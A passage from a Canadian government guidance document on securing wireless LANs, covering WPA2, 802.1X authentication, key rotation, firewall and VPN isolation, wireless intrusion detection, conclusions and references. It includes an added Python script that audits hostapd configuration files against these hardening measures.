The original wireless security mechanism, WEP, has been shown to be weak and ineffective as a security measure and, due to the prevalence of freely available “WEP-cracking” programs, will only deter casual attempts at eavesdropping. The latest WPA2/802.11i security standard is strong (particularly when 802.1X authentication is also used; see next section), addresses virtually all of the weaknesses of WEP and utilizes very strong AES-based encryption. CSE recommends that WPA2 must be used on all 802.11 wireless networks, particularly where security and privacy are important.

Therefore, only hardware supporting WPA2 wireless security should be considered for new purchases, and older existing equipment which does not support WPA2 should be upgraded or replaced wherever possible.

When security and privacy are paramount, even WPA2 may not be sufficient and other options should be considered. For example, the addition of strong data encryption products such as VPNs would greatly reduce this security risk.
6.6 Use 802.1X Server-based Authentication

Thus far, WPA2 has been found to be a robust security mechanism with comparatively few vulnerabilities; however, it may be strengthened further through the use of 802.1X server-based authentication. Use of an external server allows implementation of user-based authentication and access control as well as integration with existing security mechanisms that may be in place, including, but not limited to, smart cards, security tokens, PKI and biometrics.

6.7 Change the Key Frequently

Whenever using encryption, the encryption key needs to be changed frequently in order to minimize the amount of data that may be processed with any one key. This makes it more difficult for an attacker to collect sufficient data to compromise the key. It also reduces the amount of time that a compromised key may be useful to an attacker. This also applies to the encryption used in WLAN products: if 802.1X server-based authentication is not available and the Pre-Shared Key mode must be used, it is imperative that the passphrase be changed on a regular basis to ensure the security of the network.

6.8 Use a VPN and Firewall to Isolate the WLAN

In most cases, the coverage of a WLAN extends outside of the physical security at a location. Therefore, the WLAN should be treated as a hostile network, just as the Internet is. A network firewall should be used to separate the internal wired LAN from the WLAN access point and all wireless clients. A VPN, Secure Shell (SSH) tunneling and end-to-end encryption are appropriate supplemental solutions to protect traffic on and between the wired LAN and the WLAN.

6.9 Use a Personal Firewall on Every Wireless Client

Wireless clients are very exposed. They require protection in the form of personal firewalls to filter both incoming and outgoing traffic. Some of these products may be used to provide enhanced authentication capabilities as well.

6.10 Consider Wireless Intrusion Detection/Prevention Systems

Wireless Intrusion Detection System (WIDS) and Wireless Intrusion Prevention System (WIPS) products are now available to complement intrusion detection systems designed for wired infrastructure. These systems utilize sensors in the form of specialized wireless receivers to monitor a coverage area for attempts to access the protected network from unauthorized clients. Additionally, the system will monitor for rogue access points, misconfigured access points, use of ad-hoc network connections, attempts at MAC address spoofing and attempts at launching denial-of-service attacks. By placing many sensors in the coverage area, a WIDS may even determine the physical location of an intruder by triangulation and, for example, plot this location on a building map. Wireless Intrusion Prevention products may also feature active defenses against unauthorized access: some of these systems can transmit specially crafted packets which can prevent an unauthorized client from gaining access to a network, disable a rogue or misconfigured access point, or even prevent some forms of wireless denial-of-service. Note, however, that these crafted packets are often not compliant with the 802.11 standard, and testing should be done before enabling these active intrusion prevention features to ensure that there is no blockage of or interference with legitimate traffic and devices.
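Measures 6.3 through 6.7 are all settings that can be checked on the access point itself. The following is an added example, not code from ITSPSR-21A or from the hostapd project: it parses hostapd-style key=value configuration text and reports which of the measures above are missing, with a constructed out-of-the-box configuration beside a constructed hardened one. The option names (`ssid`, `ignore_broadcast_ssid`, `wpa`, `wpa_key_mgmt`, `rsn_pairwise`, `wep_key0`, `ieee8021x`, `auth_server_*`, `wpa_group_rekey`) are real hostapd options; the list of factory SSIDs, the 20-character passphrase minimum and the one-hour rekey ceiling are assumptions made for this example.

```python
# Added example, not code from ITSPSR-21A or from the hostapd project.
# Parses hostapd-style configuration text and maps gaps to section 6 measures.
# Option names are real hostapd options; both configurations, the default-SSID
# sample and the policy thresholds are constructed for this example.

# Constructed sample of factory SSIDs; a real list would be vendor-specific.
DEFAULT_SSIDS = {"linksys", "default", "NETGEAR", "dlink", "wireless"}


def parse_hostapd_conf(text):
    """Parse key=value lines, ignoring blank lines and # comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_wlan_config(conf, min_passphrase_len=20, max_rekey_seconds=3600):
    """Return findings, each tagged with the section 6 measure it maps to.
    min_passphrase_len and max_rekey_seconds are assumed local policy values."""
    findings = []
    if conf.get("ssid", "") in DEFAULT_SSIDS:
        findings.append("6.4: default SSID in use")
    if conf.get("ignore_broadcast_ssid", "0") == "0":
        findings.append("6.3: SSID broadcast in beacons")
    wpa = conf.get("wpa", "0")  # hostapd: 0 = none, 1 = WPA, 2 = WPA2/RSN, 3 = both
    if wpa == "0" or "wep_key0" in conf:
        findings.append("6.5: open or WEP network, WPA2 not enabled")
    elif wpa != "2":
        findings.append("6.5: WPA (pre-802.11i) still accepted; set wpa=2")
    pairwise = conf.get("rsn_pairwise", conf.get("wpa_pairwise", ""))
    if "TKIP" in pairwise:
        findings.append("6.5: TKIP cipher accepted; allow CCMP (AES) only")
    key_mgmt = conf.get("wpa_key_mgmt", "")
    if "WPA-EAP" not in key_mgmt:
        findings.append("6.6: no 802.1X (WPA-EAP) key management")
    if "WPA-PSK" in key_mgmt and len(conf.get("wpa_passphrase", "")) < min_passphrase_len:
        findings.append("6.7: PSK passphrase shorter than %d characters (assumed policy)"
                        % min_passphrase_len)
    rekey = int(conf.get("wpa_group_rekey", "0") or 0)
    if rekey == 0 or rekey > max_rekey_seconds:
        findings.append("6.7: wpa_group_rekey not set explicitly or longer than %d s (assumed policy)"
                        % max_rekey_seconds)
    return findings


WEAK_CONF = """\
# constructed: typical out-of-the-box settings (WEP, factory SSID, beaconed)
interface=wlan0
ssid=linksys
channel=6
wep_default_key=0
wep_key0=0123456789
"""

HARDENED_CONF = """\
# constructed: section 6 measures applied (WPA2, CCMP, 802.1X, hidden SSID)
interface=wlan0
ssid=dept-5f-east-rsn
channel=6
ignore_broadcast_ssid=1
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
auth_server_addr=192.0.2.10
auth_server_port=1812
auth_server_shared_secret=REPLACE-WITH-RADIUS-SECRET
wpa_group_rekey=600
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_wlan_config(parse_hostapd_conf(text)) or ["no findings"])
```

The audit deliberately treats a missing `wpa` line as `wpa=0`, which is hostapd's meaning, so an AP that was never configured for WPA shows up as an open or WEP network rather than passing silently; the 192.0.2.10 RADIUS address is a documentation address standing in for a site's own authentication server.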
7 Future Work

CSEC continues to research solutions that will mitigate the vulnerabilities associated with WLANs, and will release updates to this publication whenever new pertinent information becomes available. CSEC is in the process of developing a recommendation for secure-WLAN architecture for the GC which will further mitigate risks.

In the meantime, GC departments may contact CSEC client services to obtain current advice and recommendations regarding security of WLANs: client.svcs@cse-cst.gc.ca or (613) 991-7654.
8 Conclusions and Recommendations

Unlike wired LANs, the WLAN exists on a medium without physical bounds. With a WLAN, transmitted data is broadcast over the air using radio waves that can be received by any WLAN client in the area served by the data transmitter. Because radio waves travel through ceilings, floors and walls, transmitted data may reach unintended recipients on different floors and even outside the building of the transmitter. This creates major security concerns as the side effect of the mobility and convenience a WLAN offers.

The latest revisions to the IEEE 802.11 standard specify an improved security mechanism: 802.11i or WPA2 for authentication and data confidentiality. This mechanism offers strong AES-based encryption and support for virtually any authentication scheme via 802.1X. When a strong authentication method is chosen, 802.11i/WPA2 addresses the weaknesses of and supersedes all previous security mechanisms, including WEP and WPA. Based on these findings, CSEC recommends that the WPA2 security mechanism must be enabled for all GC 802.11-based WLANs; older hardware must be upgraded or replaced with devices that support WPA2. In cases where older hardware cannot be immediately upgraded or replaced, the strongest security mechanism available (WPA if possible, WEP if not) should be enabled according to the guidelines documented here, and supplemental security measures such as VPNs must also be implemented to mitigate the risks associated with the weak security mechanisms in the wireless hardware.

Note, however, that even the strengthened measures in WPA2 are strictly only intended to provide protection for a WLAN against casual unauthorized eavesdropping and to ensure data integrity. Because many aspects of WPA2 are optional or require additional external components for the strongest security, it is possible for these features to be disabled; indeed, in most out-of-the-box “Plug-and-Play” deployments of WLAN hardware, very weak default security settings are the norm, and all that is required for an unauthorized user to be able to observe wireless traffic or even join a corporate network is to obtain the SSID, which can be easily discovered through readily available hardware and software tools. Additionally, because it is difficult to devise one single solution to address all of the complex security issues faced by the WLAN standard, WPA2 should not be considered adequate in providing privacy protection in situations where particularly sensitive information may be transmitted over wireless networks. In such situations supplemental security measures must be considered.
9 References

[1] “International Standard ISO/IEC 8802-11:1999(E); ANSI/IEEE Std 802.11, 1999 Edition; IEEE Standard for Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications.” International Organization for Standardization, International Electrotechnical Commission, and The Institute of Electrical and Electronics Engineers, 1999.

[2] “IEEE Std 802.11a-1999 (Supplement to ANSI/IEEE Std 802.11-1999), Supplement to International Standard ISO/IEC 8802-11:1999(E); ANSI/IEEE Std 802.11, 1999 Edition; IEEE Standard for Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: Higher-Speed Physical Layer Extension in the 5 GHz Band,” International Organization for Standardization, International Electrotechnical Commission, and The Institute of Electrical and Electronics Engineers, 1999.

[3] “IEEE Std 802.11b-1999 (Supplement to ANSI/IEEE Std 802.11-1999), Supplement to International Standard ISO/IEC 8802-11:1999(E); ANSI/IEEE Std 802.11, 1999 Edition; IEEE Standard for Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: Higher-Speed Physical Layer Extension in the 2.4 GHz Band,” International Organization for Standardization, International Electrotechnical Commission, and The Institute of Electrical and Electronics Engineers, 1999.

[4] “Wi-Fi: The Standard for Wireless Fidelity,” Wireless Ethernet Compatibility Alliance (WECA) Ltd. [Online]. Available: http://www.wirelessethernet.org

[5] “Wi-Fi System Interoperability Test Plan, Version 1.0,” Wireless Ethernet Compatibility Alliance, February 2000. [Online]. Available: http://www.wirelessethernet.org

[6] W. A. Arbaugh, N. Shankar, and Y. J. Wan, “Your 802.11 wireless network has no clothes,” University of Maryland, College Park, Maryland, March 2001. [Online]. Available: http://www.cs.umd.edu/~waa/wireless.pdf

[7] J. R. Walker, “Unsafe at any key size: An analysis of the WEP encapsulation,” Intel Corp., Hillsboro, OR, October 2000. Doc.: IEEE 802.11-00/362. [Online]. Available: http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/0-362.zip

[8] J. R. Walker, “Overview of 802.11 Security,” Intel Corp., Hillsboro, OR, March 2000. Doc.: IEEE 802.15-01/154. [Online]. Available: http://grouper.ieee.org/groups/802/15/pub/2001/Mar01/01154r0P802-15_TG3-Overview-of-802-11-Security.ppt

[9] N. Borisov, I. Goldberg, and D. Wagner, “Intercepting Mobile Communications: The Insecurity of 802.11,” UC Berkeley. Presented at the Seventh Annual International Conference on Mobile Computing and Networking, July 2001. [Online]. Available: http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf

[10] W. A. Arbaugh, “An inductive chosen plaintext attack against WEP/WEP2,” University of Maryland, College Park, Maryland, May 2001. Doc.: IEEE 802.11-01/230r1. [Online]. Available: http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/1-230.zip

[11] S. Fluhrer, I. Mantin, and A. Shamir, “Weakness in the Key Scheduling Algorithm of RC4.” Eighth Annual Workshop on Selected Areas in Cryptography, August 2001.

[12] “Network Stumbler,” software. [Online]. Available: http://www.netstumbler.com

[13] A. Stubblefield, J. Ioannidis, and A. D. Rubin, “Using the Fluhrer, Mantin, and Shamir Attack to Break WEP,” Rice University, AT&T Labs, August 2001. AT&T Tech. Report TD-4ZCPZZ. [Online]. Available: http://www.cs.rice.edu/~astubble/

[14] N. Borisov, I. Goldberg, and D. Wagner, “(In)Security of the WEP algorithm,” UC Berkeley. [Online]. Available: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html

[15] “AirSnort,” software. [Online]. Available: http://airsnort.sourceforge.net

[16] “WEPCrack,” software. [Online]. Available: http://wepcrack.sourceforge.net

[17] “Sniffer Wireless Pro,” software. [Online]. Available: http://www.sniffer.com

[18] “AiroPeek,” software. [Online]. Available: http://www.wildpackets.com

[19] B. Fleck and J. Dimov, “Wireless Access Points and ARP Poisoning: Wireless vulnerabilities that expose the wired network,” Cigital, Inc. [Online]. Available: http://www.cigitallabs.com/resources/papers/download/arppoison.pdf

[20] A. Mishra and W. Arbaugh, “An Initial Analysis of the IEEE 802.1X Standard,” February 2002.

[21] “Establishing Wireless Robust Security Networks: A Guide to IEEE 802.11i,” NIST Publication Number 800-97, Feb 2007.

[22] G. Lehembre, “Wi-Fi Security – WEP, WPA and WPA2,” June 2005, Hakin9.org newsletter.
